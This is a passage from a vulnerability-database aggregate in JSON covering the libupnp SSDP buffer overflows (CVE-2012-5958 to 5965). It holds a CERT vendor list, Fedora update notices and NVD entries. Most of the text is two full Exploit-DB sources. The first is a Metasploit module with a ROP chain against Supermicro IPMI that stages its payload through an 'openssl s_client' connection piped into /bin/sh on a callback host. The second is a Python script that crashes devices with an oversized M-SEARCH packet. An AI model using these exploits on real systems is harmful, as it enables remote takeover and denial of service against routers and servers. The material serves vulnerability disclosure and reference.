Unknown\n\nNotified: January 04, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sitecom Unknown\n\nNotified: January 04, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TP-Link Unknown\n\nNotified: January 04, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Texas Instruments Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: December 04, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Visual Tools Unknown\n\nNotified: January 10, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information 
regarding this vulnerability.\n\n### orb Networks Unknown\n\nNotified: January 16, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 35 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 8.7 | E:H/RL:OF/RC:C \nEnvironmental | 6.5 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://pupnp.sourceforge.net/>\n * <https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play>\n * <https://community.rapid7.com/docs/DOC-2150>\n * <https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf>\n * <http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp>\n * <http://www.kb.cert.org/vuls/id/357851>\n * <http://opentools.homeip.net/dev-tools-for-upnp>\n * <http://upnp.sourceforge.net/>\n\n### Acknowledgements\n\nThanks to HD Moore of Rapid7 for reporting this vulnerability, and Tod Beardsley for coordination support.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-5958](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5958>), [CVE-2012-5959](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5959>), [CVE-2012-5960](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5960>), [CVE-2012-5961](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5961>), [CVE-2012-5962](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5962>), [CVE-2012-5963](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5963>), [CVE-2012-5964](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5964>), [CVE-2012-5965](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5965>) \n---|--- \n**Date Public:** | 2013-01-29 \n**Date First Published:** 
| 2013-01-29 \n**Date Last Updated: ** | 2014-07-30 19:13 UTC \n**Document Revision: ** | 69 \n", "modified": "2014-07-30T19:13:00", "published": "2013-01-29T00:00:00", "id": "VU:922681", "href": "https://www.kb.cert.org/vuls/id/922681", "type": "cert", "title": "Portable SDK for UPnP Devices (libupnp) contains multiple buffer overflows in SSDP", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "MediaTomb is an open source (GPL) UPnP MediaServer with a nice web user interface, it allows you to stream your digital media through your home network and listen to/watch it on a variety of UPnP compatible devices. MediaTomb implements the UPnP MediaServer V 1.0 specification that can be found on http://www.upnp.org/. ", "modified": "2013-02-21T05:48:15", "published": "2013-02-21T05:48:15", "id": "FEDORA:7AED420F62", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: mediatomb-0.12.1-23.fc17", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "The Universal Plug and Play (UPnP) SDK for Linux provides support for building UPnP-compliant control points, devices, and bridges on Linux. 
", "modified": "2013-02-12T05:32:58", "published": "2013-02-12T05:32:58", "id": "FEDORA:4299220A19", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: libupnp-1.6.18-1.fc18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "The Universal Plug and Play (UPnP) SDK for Linux provides support for building UPnP-compliant control points, devices, and bridges on Linux. ", "modified": "2013-02-12T05:34:07", "published": "2013-02-12T05:34:07", "id": "FEDORA:8CF1320B49", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: libupnp-1.6.18-1.fc16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "MediaTomb is an open source (GPL) UPnP MediaServer with a nice web user interface, it allows you to stream your digital media through your home network and listen to/watch it on a variety of UPnP compatible devices. MediaTomb implements the UPnP MediaServer V 1.0 specification that can be found on http://www.upnp.org/. 
", "modified": "2013-02-21T05:32:14", "published": "2013-02-21T05:32:14", "id": "FEDORA:4ECCF20F1C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: mediatomb-0.12.1-23.fc18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "The Universal Plug and Play (UPnP) SDK for Linux provides support for building UPnP-compliant control points, devices, and bridges on Linux. ", "modified": "2013-02-12T05:10:57", "published": "2013-02-12T05:10:57", "id": "FEDORA:02152208BF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: libupnp-1.6.18-1.fc17", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T23:20:35", "description": "Portable UPnP SDK unique_service_name() Remote Code Execution. CVE-2012-5858,CVE-2012-5958,CVE-2012-5959,CVE-2012-5960,CVE-2012-5961,CVE-2012-5962,CVE-2012-5...", "published": "2013-02-05T00:00:00", "type": "exploitdb", "title": "Portable UPnP SDK unique_service_name Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5961", "CVE-2012-5858", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "modified": "2013-02-05T00:00:00", "id": "EDB-ID:24455", "href": "https://www.exploit-db.com/exploits/24455/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the unique_service_name()\r\n\t\t\t\tfunction of libupnp's SSDP processor. The libupnp library is used across\r\n\t\t\t\tthousands of devices and is referred to as the Intel SDK for UPnP\r\n\t\t\t\tDevices or the Portable SDK for UPnP Devices.\r\n\r\n\t\t\t\tDue to size limitations on many devices, this exploit uses a separate TCP\r\n\t\t\t\tlistener to stage the real payload.\r\n\t\t\t},\r\n\t\t\t'Author' => [\r\n\t\t\t\t\t'hdm', # Exploit dev for Supermicro IPMI\r\n\t\t\t\t\t'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI\r\n\t\t\t\t\t'Richard Harman <richard[at]richardharman.com>' # Binaries, system info, testing for Supermicro IPMI\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-5858' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '922681' ],\r\n\t\t\t\t\t[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ]\r\n\t\t\t\t],\r\n\t\t\t'Platform' => ['unix'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n#\r\n#\t\t\t\t\t# The following BadChars do not apply since we stage the payload\r\n#\t\t\t\t\t# through a secondary connection. 
This is just for reference.\r\n#\r\n#\t\t\t\t\t'BadChars' =>\r\n#\t\t\t\t\t\t# Bytes 0-8 are not allowed\r\n#\t\t\t\t\t\t[*(0..8)].pack(\"C*\") +\r\n#\t\t\t\t\t\t# 0x09, 0x0a, 0x0d are allowed\r\n#\t\t\t\t\t\t\"\\x0b\\x0c\\x0e\\x0f\" +\r\n#\t\t\t\t\t\t# All remaining bytes up to space are restricted\r\n#\t\t\t\t\t\t[*(0x10..0x1f)].pack(\"C*\") +\r\n#\t\t\t\t\t\t# Also not allowed\r\n#\t\t\t\t\t\t\"\\x7f\\x3a\" +\r\n#\t\t\t\t\t\t# Breaks our string quoting\r\n#\t\t\t\t\t\t\"\\x22\",\r\n\r\n\t\t\t\t\t# Unlimited since we stage this over a secondary connection\r\n\t\t\t\t\t'Space' => 8000,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t# specific payloads vary widely by device (openssl for IPMI, etc)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t[ \"Automatic\", { } ],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# ROP targets are difficult to represent in the hash, use callbacks instead\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ \"Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1\", {\r\n\r\n\t\t\t\t\t\t# The callback handles all target-specific settings\r\n\t\t\t\t\t\t:callback => :target_supermicro_ipmi_131,\r\n\r\n\t\t\t\t\t\t# This matches any line of the SSDP M-SEARCH response\r\n\t\t\t\t\t\t:fingerprint =>\r\n\t\t\t\t\t\t\t/Server:\\s*Linux\\/2\\.6\\.17\\.WB_WPCM450\\.1\\.3 UPnP\\/1\\.0, Intel SDK for UPnP devices\\/1\\.3\\.1/mi\r\n\r\n\t\t\t\t\t\t#\r\n\t\t\t\t\t\t# SSDP response:\r\n\t\t\t\t\t\t#\tLinux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n\t\t\t\t\t\t#\thttp://192.168.xx.xx:49152/IPMIdevicedesc.xml\r\n\t\t\t\t\t\t#\tuuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n\r\n\t\t\t\t\t\t# Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03)\r\n\r\n\t\t\t\t\t} ],\r\n\r\n\t\t\t\t\t[ \"Debug Target\", {\r\n\r\n\t\t\t\t\t\t# The callback handles all target-specific settings\r\n\t\t\t\t\t\t:callback => 
:target_debug\r\n\r\n\t\t\t\t\t} ]\r\n\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 29 2013'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RHOST(),\r\n\t\t\t\tOpt::RPORT(1900),\r\n\t\t\t\tOptAddress.new('CBHOST', [ false, \"The listener address used for staging the real payload\" ]),\r\n\t\t\t\tOptPort.new('CBPORT', [ false, \"The listener port used for staging the real payload\" ])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\tconfigure_socket\r\n\r\n\t\ttarget_info = choose_target\r\n\r\n\t\tunless self.respond_to?(target_info[:callback])\r\n\t\t\tprint_error(\"Invalid target specified: no callback function defined\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tbuffer = self.send(target_info[:callback])\r\n\t\tpkt =\r\n\t\t\t\"M-SEARCH * HTTP/1.1\\r\\n\" +\r\n\t\t\t\"Host:239.255.255.250:1900\\r\\n\" +\r\n\t\t\t\"ST:uuid:schemas:device:\" + buffer + \":end\\r\\n\" +\r\n\t\t\t\"Man:\\\"ssdp:discover\\\"\\r\\n\" +\r\n\t\t\t\"MX:3\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...\")\r\n\r\n\t\tr = udp_sock.sendto(pkt, rhost, rport, 0)\r\n\r\n\t\t1.upto(5) do\r\n\t\t\t::IO.select(nil, nil, nil, 1)\r\n\t\t\tbreak if session_created?\r\n\t\tend\r\n\r\n\t\t# No handler() support right now\r\n\tend\r\n\r\n\r\n\r\n\t# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc\r\n\tdef target_supermicro_ipmi_131\r\n\r\n\t\t# Create a fixed-size buffer for the payload\r\n\t\tbuffer = Rex::Text.rand_text_alpha(2000)\r\n\r\n\t\t# Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()\r\n\t\tbuffer[0,1] = '\"'\r\n\t\tbuffer[1999,1] = '\"'\r\n\r\n\t\t# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise\r\n\t\tcbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])\r\n\r\n\t\t# Start a 
listener\r\n\t\tstart_listener(true)\r\n\r\n\t\t# Figure out the port we picked\r\n\t\tcbport = self.service.getsockname[2]\r\n\r\n\t\t# Restart the service and use openssl to stage the real payload\r\n\t\t# Staged because only ~150 bytes of contiguous data are available before mangling\r\n\t\tcmd = \"sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#\"\r\n\t\tbuffer[432, cmd.length] = cmd\r\n\r\n\t\t# Adjust $r3 to point from the bottom of the stack back into our buffer\r\n\t\tbuffer[304,4] = [0x4009daf8].pack(\"V\") #\r\n\t\t\t# 0x4009daf8:\tadd\tr3, r3, r4, lsl #2\r\n\t\t\t# 0x4009dafc:\tldr\tr0, [r3, #512]\t; 0x200\r\n\t\t\t# 0x4009db00:\tpop\t{r4, r10, pc}\r\n\r\n\t\t# The offset (right-shifted by 2 ) to our command string above\r\n\t\tbuffer[284,4] = [0xfffffe78].pack(\"V\") #\r\n\r\n\t\t# Copy $r3 into $r0\r\n\t\tbuffer[316,4] = [0x400db0ac].pack(\"V\")\r\n\t\t\t# 0x400db0ac <_IO_wfile_underflow+1184>:\tsub\tr0, r3, #1\r\n\t\t\t# 0x400db0b0 <_IO_wfile_underflow+1188>:\tpop\t{pc}\t\t; (ldr pc, [sp], #4)\r\n\r\n\t\t# Move our stack pointer down so as not to corrupt our payload\r\n\t\tbuffer[320,4] = [0x400a5568].pack(\"V\")\r\n\t\t\t# 0x400a5568 <__default_rt_sa_restorer_v2+5448>:\tadd\tsp, sp, #408\t; 0x198\r\n\t\t\t# 0x400a556c <__default_rt_sa_restorer_v2+5452>:\tpop\t{r4, r5, pc}\r\n\r\n\t\t# Finally return to system() with $r0 pointing to our string\r\n\t\tbuffer[141,4] = [0x400add8c].pack(\"V\")\r\n\r\n\t\treturn buffer\r\n=begin\r\n\t\t00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev\r\n\t\t00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev\r\n\t\t00032000-00055000 rwxp 00000000 00:00 0 [heap]\r\n\t\t40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so\r\n\t\t40015000-40017000 rwxp 00000000 00:00 0\r\n\t\t4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so\r\n\t\t4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so\r\n\t\t4001e000-4002d000 r-xp 00000000 08:01 
709535 /lib/libpthread-0.10.so\r\n\t\t4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so\r\n\t\t40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so\r\n\t\t40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so\r\n\t\t40036000-40078000 rwxp 00000000 00:00 0\r\n\t\t40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so\r\n\t\t40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so\r\n\t\t40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so\r\n\t\t40185000-40187000 rwxp 00000000 00:00 0\r\n\t\tbd600000-bd601000 ---p 00000000 00:00 0\r\n\t\tbd601000-bd800000 rwxp 00000000 00:00 0\r\n\t\tbd800000-bd801000 ---p 00000000 00:00 0\r\n\t\tbd801000-bda00000 rwxp 00000000 00:00 0\r\n\t\tbdc00000-bdc01000 ---p 00000000 00:00 0\r\n\t\tbdc01000-bde00000 rwxp 00000000 00:00 0\r\n\t\tbe000000-be001000 ---p 00000000 00:00 0\r\n\t\tbe001000-be200000 rwxp 00000000 00:00 0\r\n\t\tbe941000-be956000 rwxp 00000000 00:00 0 [stack]\r\n=end\r\n\r\n\tend\r\n\r\n\t# Generate a buffer that provides a starting point for exploit development\r\n\tdef target_debug\r\n\t\tbuffer = Rex::Text.pattern_create(2000)\r\n\tend\r\n\r\n\tdef stage_real_payload(cli)\r\n\t\tprint_good(\"Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\tcli.put(payload.encoded + \"\\n\")\r\n\tend\r\n\r\n\tdef start_listener(ssl = false)\r\n\r\n\t\tcomm = datastore['ListenerComm']\r\n\t\tif comm == \"local\"\r\n\t\t\tcomm = ::Rex::Socket::Comm::Local\r\n\t\telse\r\n\t\t\tcomm = nil\r\n\t\tend\r\n\r\n\t\tself.service = Rex::Socket::TcpServer.create(\r\n\t\t\t'LocalPort' => datastore['CBPORT'],\r\n\t\t\t'SSL' => ssl,\r\n\t\t\t'SSLCert' => datastore['SSLCert'],\r\n\t\t\t'Comm' => comm,\r\n\t\t\t'Context' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Msf' => framework,\r\n\t\t\t\t\t'MsfExploit' => self,\r\n\t\t\t\t})\r\n\r\n\t\tself.service.on_client_connect_proc = Proc.new { 
|client|\r\n\t\t\tstage_real_payload(client)\r\n\t\t}\r\n\r\n\t\t# Start the listening service\r\n\t\tself.service.start\r\n\tend\r\n\r\n\t#\r\n\t# Shut down any running services\r\n\t#\r\n\tdef cleanup\r\n\t\tsuper\r\n\t\tif self.service\r\n\t\t\tprint_status(\"Shutting down payload stager listener...\")\r\n\t\t\tbegin\r\n\t\t\t\tself.service.deref if self.service.kind_of?(Rex::Service)\r\n\t\t\t\tif self.service.kind_of?(Rex::Socket)\r\n\t\t\t\t\tself.service.close\r\n\t\t\t\t\tself.service.stop\r\n\t\t\t\tend\r\n\t\t\t\tself.service = nil\r\n\t\t\trescue ::Exception\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\r\n\tdef choose_target\r\n\t\t# If the user specified a target, use that one\r\n\t\treturn self.target unless self.target.name =~ /Automatic/\r\n\r\n\t\tmsearch =\r\n\t\t\t\"M-SEARCH * HTTP/1.1\\r\\n\" +\r\n\t\t\t\"Host:239.255.255.250:1900\\r\\n\" +\r\n\t\t\t\"ST:upnp:rootdevice\\r\\n\" +\r\n\t\t\t\"Man:\\\"ssdp:discover\\\"\\r\\n\" +\r\n\t\t\t\"MX:3\\r\\n\\r\\n\"\r\n\r\n\t\t# Fingerprint the service through SSDP\r\n\t\tudp_sock.sendto(msearch, rhost, rport, 0)\r\n\r\n\t\tres = nil\r\n\t\t1.upto(5) do\r\n\t\t\tres,addr,info = udp_sock.recvfrom(65535, 1.0)\r\n\t\t\tbreak if res and res =~ /^(Server|Location)/mi\r\n\t\t\tudp_sock.sendto(msearch, rhost, rport, 0)\r\n\t\tend\r\n\r\n\t\tself.targets.each do |t|\r\n\t\t\treturn t if t[:fingerprint] and res =~ t[:fingerprint]\r\n\t\tend\r\n\r\n\t\tif res and res.to_s.length > 0\r\n\t\t\tprint_status(\"No target matches this fingerprint\")\r\n\t\t\tprint_status(\"\")\r\n\t\t\tres.to_s.split(\"\\n\").each do |line|\r\n\t\t\t\tprint_status(\" #{line.strip}\")\r\n\t\t\tend\r\n\t\t\tprint_status(\"\")\r\n\t\telse\r\n\t\t\tprint_status(\"The system #{rhost} did not reply to our M-SEARCH probe\")\r\n\t\tend\r\n\r\n\t\tfail_with(Exploit::Failure::NoTarget, \"No compatible target detected\")\r\n\tend\r\n\r\n\t# Accessor for our TCP payload stager\r\n\tattr_accessor :service\r\n\r\n\t# We need an unconnected socket because SSDP 
replies often come\r\n\t# from a different sent port than the one we sent to. This also\r\n\t# breaks the standard UDP mixin.\r\n\tdef configure_socket\r\n\t\tself.udp_sock = Rex::Socket::Udp.create({\r\n\t\t\t'Context' => { 'Msf' => framework, 'MsfExploit' => self }\r\n\t\t})\r\n\t\tadd_socket(self.udp_sock)\r\n\tend\r\n\r\n\t#\r\n\t# Required since we aren't using the normal mixins\r\n\t#\r\n\r\n\tdef rhost\r\n\t\tdatastore['RHOST']\r\n\tend\r\n\r\n\tdef rport\r\n\t\tdatastore['RPORT']\r\n\tend\r\n\r\n\t# Accessor for our UDP socket\r\n\tattr_accessor :udp_sock\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24455/"}, {"lastseen": "2020-11-27T12:43:16", "description": "", "published": "2020-11-27T00:00:00", "type": "exploitdb", "title": "libupnp 1.6.18 - Stack-based buffer overflow (DoS)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5958"], "modified": "2020-11-27T00:00:00", "id": "EDB-ID:49119", "href": "https://www.exploit-db.com/exploits/49119", "sourceData": "# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)\r\n# Date: 2020-08-20\r\n# Exploit Author: Patrik Lantz\r\n# Vendor Homepage: https://pupnp.sourceforge.io/\r\n# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download\r\n# Version: <= 1.6.6\r\n# Tested on: Linux\r\n# CVE : CVE-2012-5958\r\n\r\nimport socket\r\n\r\npayload = \"M-SEARCH * HTTP/1.1\\r\\nHOST: 239.255.255.250:1900\\r\\nST:uuid:schemas:device:\"\r\npayload += \"A\"*324 + \"BBBB\"\r\npayload += \":urn:\\r\\nMX:2\\r\\nMAN:\\\"ssdp:discover\\\"\\r\\n\\r\\n\"\r\n\r\nbyte_message = bytes(payload)\r\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\ns.sendto(byte_message, (\"239.255.255.250\", 1900))", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49119"}], "cve": 
[{"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) 1.3.1 allows remote attackers to execute arbitrary code via a long UDN (aka device) field in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected\"", "edition": 4, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5961", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5961"], "modified": "2015-09-02T16:29:00", "cpe": ["cpe:/a:libupnp_project:libupnp:1.3.1"], "id": "CVE-2012-5961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5961", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:libupnp_project:libupnp:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) 1.3.1 allows remote attackers to execute arbitrary code via a long UDN (aka uuid) field within a string that lacks a 
:: (colon colon) in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected\"", "edition": 4, "cvss3": {}, "published": "2013-01-31T21:55:00", "title": "CVE-2012-5963", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5963"], "modified": "2015-09-01T17:06:00", "cpe": ["cpe:/a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1"], "id": "CVE-2012-5963", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5963", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:portable_sdk_for_upnp_project:portable_sdk_for_upnp:1.3.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:57", "description": "Stack-based buffer overflow in the unique_service_name function in ssdp/ssdp_server.c in the SSDP parser in the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP devices) 1.3.1 allows remote attackers to execute arbitrary code via a long DeviceType (aka urn device) field in a UDP packet.\nPer CERT's advisory additional products may be affected: http://www.kb.cert.org/vuls/id/922681 \"Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. 
